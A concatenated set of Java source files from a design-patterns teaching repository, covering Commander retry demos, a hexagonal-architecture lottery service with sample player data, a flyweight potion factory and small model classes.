* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.masterworker;
/**
* Class ArrayResult extends abstract class {@link Result} and contains data of type int[][].
*/
public class ArrayResult extends Result<int[][]> {
public ArrayResult(int[][] data) {
super(data);
}
}
| iluwatar/java-design-patterns | master-worker/src/main/java/com/iluwatar/masterworker/ArrayResult.java |
1,059 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.commander;
import com.iluwatar.commander.employeehandle.EmployeeDatabase;
import com.iluwatar.commander.employeehandle.EmployeeHandle;
import com.iluwatar.commander.exceptions.DatabaseUnavailableException;
import com.iluwatar.commander.exceptions.PaymentDetailsErrorException;
import com.iluwatar.commander.messagingservice.MessagingDatabase;
import com.iluwatar.commander.messagingservice.MessagingService;
import com.iluwatar.commander.paymentservice.PaymentDatabase;
import com.iluwatar.commander.paymentservice.PaymentService;
import com.iluwatar.commander.queue.QueueDatabase;
import com.iluwatar.commander.shippingservice.ShippingDatabase;
import com.iluwatar.commander.shippingservice.ShippingService;
/**
* AppPaymentFailCases class looks at possible cases when Payment service is available/unavailable.
*/
public class AppPaymentFailCases {
private static final RetryParams retryParams = RetryParams.DEFAULT;
private static final TimeLimits timeLimits = TimeLimits.DEFAULT;
void paymentNotPossibleCase() {
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new PaymentDetailsErrorException());
var ss = new ShippingService(new ShippingDatabase());
var ms = new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase(new DatabaseUnavailableException());
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void paymentDatabaseUnavailableCase() {
//rest is successful
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void paymentSuccessCase() {
//goes to message after 2 retries maybe - rest is successful for now
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase());
var ms =
new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase(new DatabaseUnavailableException());
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
/**
* Program entry point.
*
* @param args command line args
*/
public static void main(String[] args) {
var apfc = new AppPaymentFailCases();
apfc.paymentSuccessCase();
}
} | iluwatar/java-design-patterns | commander/src/main/java/com/iluwatar/commander/AppPaymentFailCases.java |
1,060 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.commander;
import com.iluwatar.commander.employeehandle.EmployeeDatabase;
import com.iluwatar.commander.employeehandle.EmployeeHandle;
import com.iluwatar.commander.exceptions.DatabaseUnavailableException;
import com.iluwatar.commander.exceptions.ItemUnavailableException;
import com.iluwatar.commander.exceptions.ShippingNotPossibleException;
import com.iluwatar.commander.messagingservice.MessagingDatabase;
import com.iluwatar.commander.messagingservice.MessagingService;
import com.iluwatar.commander.paymentservice.PaymentDatabase;
import com.iluwatar.commander.paymentservice.PaymentService;
import com.iluwatar.commander.queue.QueueDatabase;
import com.iluwatar.commander.shippingservice.ShippingDatabase;
import com.iluwatar.commander.shippingservice.ShippingService;
/**
* AppShippingFailCases class looks at possible cases when Shipping service is
* available/unavailable.
*/
public class AppShippingFailCases {
private static final RetryParams retryParams = RetryParams.DEFAULT;
private static final TimeLimits timeLimits = TimeLimits.DEFAULT;
void itemUnavailableCase() {
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new ItemUnavailableException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingNotPossibleCase() {
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new ShippingNotPossibleException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingDatabaseUnavailableCase() {
//rest is successful
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingSuccessCase() {
//goes to payment after 2 retries maybe - rest is successful for now
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ms = new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
/**
* Program entry point.
*
* @param args command line args
*/
public static void main(String[] args) {
var asfc = new AppShippingFailCases();
asfc.shippingSuccessCase();
}
} | iluwatar/java-design-patterns | commander/src/main/java/com/iluwatar/commander/AppShippingFailCases.java |
1,062 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.domain.LotteryTicketCheckResult.CheckResult;
/**
* Lottery utilities.
*/
public class LotteryUtils {
private LotteryUtils() {
}
/**
* Checks if lottery ticket has won.
*/
public static LotteryTicketCheckResult checkTicketForPrize(
LotteryTicketRepository repository,
LotteryTicketId id,
LotteryNumbers winningNumbers
) {
var optional = repository.findById(id);
if (optional.isPresent()) {
if (optional.get().lotteryNumbers().equals(winningNumbers)) {
return new LotteryTicketCheckResult(CheckResult.WIN_PRIZE, 1000);
} else {
return new LotteryTicketCheckResult(CheckResult.NO_PRIZE);
}
} else {
return new LotteryTicketCheckResult(CheckResult.TICKET_NOT_SUBMITTED);
}
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryUtils.java |
1,063 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.factory.method;
import lombok.Getter;
import lombok.RequiredArgsConstructor;
/**
* OrcWeapon.
*/
public record OrcWeapon(WeaponType weaponType) implements Weapon {
@Override
public String toString() {
return "an orcish " + weaponType;
}
}
| iluwatar/java-design-patterns | factory-method/src/main/java/com/iluwatar/factory/method/OrcWeapon.java |
1,065 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
/**
* Immutable value object containing lottery player details.
*/
public record PlayerDetails(String email, String bankAccount, String phoneNumber) {}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/PlayerDetails.java |
1,066 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.eda.model;
import com.iluwatar.eda.event.UserCreatedEvent;
import com.iluwatar.eda.event.UserUpdatedEvent;
import lombok.Getter;
import lombok.RequiredArgsConstructor;
/**
* This {@link User} class is a basic pojo used to demonstrate user data sent along with the {@link
* UserCreatedEvent} and {@link UserUpdatedEvent} events.
*/
public record User(String username) {}
| iluwatar/java-design-patterns | event-driven-architecture/src/main/java/com/iluwatar/eda/model/User.java |
1,067 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import java.util.EnumMap;
import java.util.Map;
/**
* PotionFactory is the Flyweight in this example. It minimizes memory use by sharing object
* instances. It holds a map of potion instances and new potions are created only when none of the
* type already exists.
*/
public class PotionFactory {
private final Map<PotionType, Potion> potions;
public PotionFactory() {
potions = new EnumMap<>(PotionType.class);
}
Potion createPotion(PotionType type) {
var potion = potions.get(type);
if (potion == null) {
switch (type) {
case HEALING -> potion = new HealingPotion();
case HOLY_WATER -> potion = new HolyWaterPotion();
case INVISIBILITY -> potion = new InvisibilityPotion();
case POISON -> potion = new PoisonPotion();
case STRENGTH -> potion = new StrengthPotion();
default -> {
}
}
if (potion != null) {
potions.put(type, potion);
}
}
return potion;
}
}
| rajprins/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/PotionFactory.java |
1,070 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import static com.iluwatar.hexagonal.domain.LotteryConstants.SERVICE_BANK_ACCOUNT;
import static com.iluwatar.hexagonal.domain.LotteryConstants.TICKET_PRIZE;
import com.google.inject.Inject;
import com.iluwatar.hexagonal.banking.WireTransfers;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.eventlog.LotteryEventLog;
import java.util.Optional;
/**
* Implementation for lottery service.
*/
public class LotteryService {
private final LotteryTicketRepository repository;
private final LotteryEventLog notifications;
private final WireTransfers wireTransfers;
/**
* Constructor.
*/
@Inject
public LotteryService(LotteryTicketRepository repository, LotteryEventLog notifications,
WireTransfers wireTransfers) {
this.repository = repository;
this.notifications = notifications;
this.wireTransfers = wireTransfers;
}
/**
* Submit lottery ticket to participate in the lottery.
*/
public Optional<LotteryTicketId> submitTicket(LotteryTicket ticket) {
var playerDetails = ticket.playerDetails();
var playerAccount = playerDetails.bankAccount();
var result = wireTransfers.transferFunds(TICKET_PRIZE, playerAccount, SERVICE_BANK_ACCOUNT);
if (!result) {
notifications.ticketSubmitError(playerDetails);
return Optional.empty();
}
var optional = repository.save(ticket);
if (optional.isPresent()) {
notifications.ticketSubmitted(playerDetails);
}
return optional;
}
/**
* Check if lottery ticket has won.
*/
public LotteryTicketCheckResult checkTicketForPrize(
LotteryTicketId id,
LotteryNumbers winningNumbers
) {
return LotteryUtils.checkTicketForPrize(repository, id, winningNumbers);
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryService.java |
1,071 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.sampledata;
import com.iluwatar.hexagonal.banking.InMemoryBank;
import com.iluwatar.hexagonal.domain.LotteryConstants;
import com.iluwatar.hexagonal.domain.LotteryNumbers;
import com.iluwatar.hexagonal.domain.LotteryService;
import com.iluwatar.hexagonal.domain.LotteryTicket;
import com.iluwatar.hexagonal.domain.LotteryTicketId;
import com.iluwatar.hexagonal.domain.PlayerDetails;
import java.security.SecureRandom;
import java.util.AbstractMap.SimpleEntry;
import java.util.List;
import java.util.stream.Collectors;
/**
* Utilities for creating sample lottery tickets.
*/
public class SampleData {
private static final List<PlayerDetails> PLAYERS;
private static final SecureRandom RANDOM = new SecureRandom();
static {
PLAYERS = List.of(
new PlayerDetails("[email protected]", "312-342", "+3242434242"),
new PlayerDetails("[email protected]", "234-987", "+23452346"),
new PlayerDetails("[email protected]", "833-836", "+63457543"),
new PlayerDetails("[email protected]", "319-826", "+24626"),
new PlayerDetails("[email protected]", "983-322", "+3635635"),
new PlayerDetails("[email protected]", "934-734", "+0898245"),
new PlayerDetails("[email protected]", "536-738", "+09845325"),
new PlayerDetails("[email protected]", "453-936", "+2423532"),
new PlayerDetails("[email protected]", "114-988", "+5646346524"),
new PlayerDetails("[email protected]", "663-765", "+928394235"),
new PlayerDetails("[email protected]", "334-763", "+35448"),
new PlayerDetails("[email protected]", "735-964", "+98752345"),
new PlayerDetails("[email protected]", "734-853", "+043842423"),
new PlayerDetails("[email protected]", "334-746", "+73294135"),
new PlayerDetails("[email protected]", "444-766", "+358042354"),
new PlayerDetails("[email protected]", "895-345", "+9752435"),
new PlayerDetails("[email protected]", "760-009", "+34203542"),
new PlayerDetails("[email protected]", "425-907", "+9872342"),
new PlayerDetails("[email protected]", "023-638", "+673824122"),
new PlayerDetails("[email protected]", "335-886", "+5432503945"),
new PlayerDetails("[email protected]", "225-946", "+9872341324"),
new PlayerDetails("[email protected]", "265-748", "+134124"),
new PlayerDetails("[email protected]", "190-045", "+34453452"),
new PlayerDetails("[email protected]", "241-465", "+9897641231"),
new PlayerDetails("[email protected]", "746-936", "+42345298345"),
new PlayerDetails("[email protected]", "946-384", "+79831742"),
new PlayerDetails("[email protected]", "310-992", "+0498837412"),
new PlayerDetails("[email protected]", "032-045", "+67834134"),
new PlayerDetails("[email protected]", "000-346", "+498723"),
new PlayerDetails("[email protected]", "994-989", "+987324454"),
new PlayerDetails("[email protected]", "546-634", "+987642435"),
new PlayerDetails("[email protected]", "342-874", "+7834325"),
new PlayerDetails("[email protected]", "024-653", "+980742154"),
new PlayerDetails("[email protected]", "834-935", "+876423145"),
new PlayerDetails("[email protected]", "284-936", "+09843212345"),
new PlayerDetails("[email protected]", "843-073", "+678324123"),
new PlayerDetails("[email protected]", "637-738", "+09842354"),
new PlayerDetails("[email protected]", "143-947", "+375245"),
new PlayerDetails("[email protected]", "842-404", "+131243252")
);
var wireTransfers = new InMemoryBank();
PLAYERS.stream()
.map(PlayerDetails::bankAccount)
.map(e -> new SimpleEntry<>(e, RANDOM.nextInt(LotteryConstants.PLAYER_MAX_BALANCE)))
.collect(Collectors.toMap(SimpleEntry::getKey, SimpleEntry::getValue))
.forEach(wireTransfers::setFunds);
}
/**
* Inserts lottery tickets into the database based on the sample data.
*/
public static void submitTickets(LotteryService lotteryService, int numTickets) {
for (var i = 0; i < numTickets; i++) {
var randomPlayerDetails = getRandomPlayerDetails();
var lotteryNumbers = LotteryNumbers.createRandom();
var lotteryTicketId = new LotteryTicketId();
var ticket = new LotteryTicket(lotteryTicketId, randomPlayerDetails, lotteryNumbers);
lotteryService.submitTicket(ticket);
}
}
private static PlayerDetails getRandomPlayerDetails() {
return PLAYERS.get(RANDOM.nextInt(PLAYERS.size()));
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/sampledata/SampleData.java |
1,072 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
/** An Orc implementation of a Creature. */
public class Orc extends Creature {
/**
* A constructor that initializes the attributes of an orc.
*
* @param name as the name of the creature.
*/
public Orc(String name) {
super(name);
setType(CreatureType.ORC);
setDamage(CreatureStats.ORC_DAMAGE.getValue());
setHealth(CreatureStats.ORC_HEALTH.getValue());
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Orc.java |
1,073 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.Data;
import lombok.NoArgsConstructor;
/**
* User model.
*/
@Data
@NoArgsConstructor
public class UserModel {
private String name;
private String email;
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/UserModel.java |
1,075 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
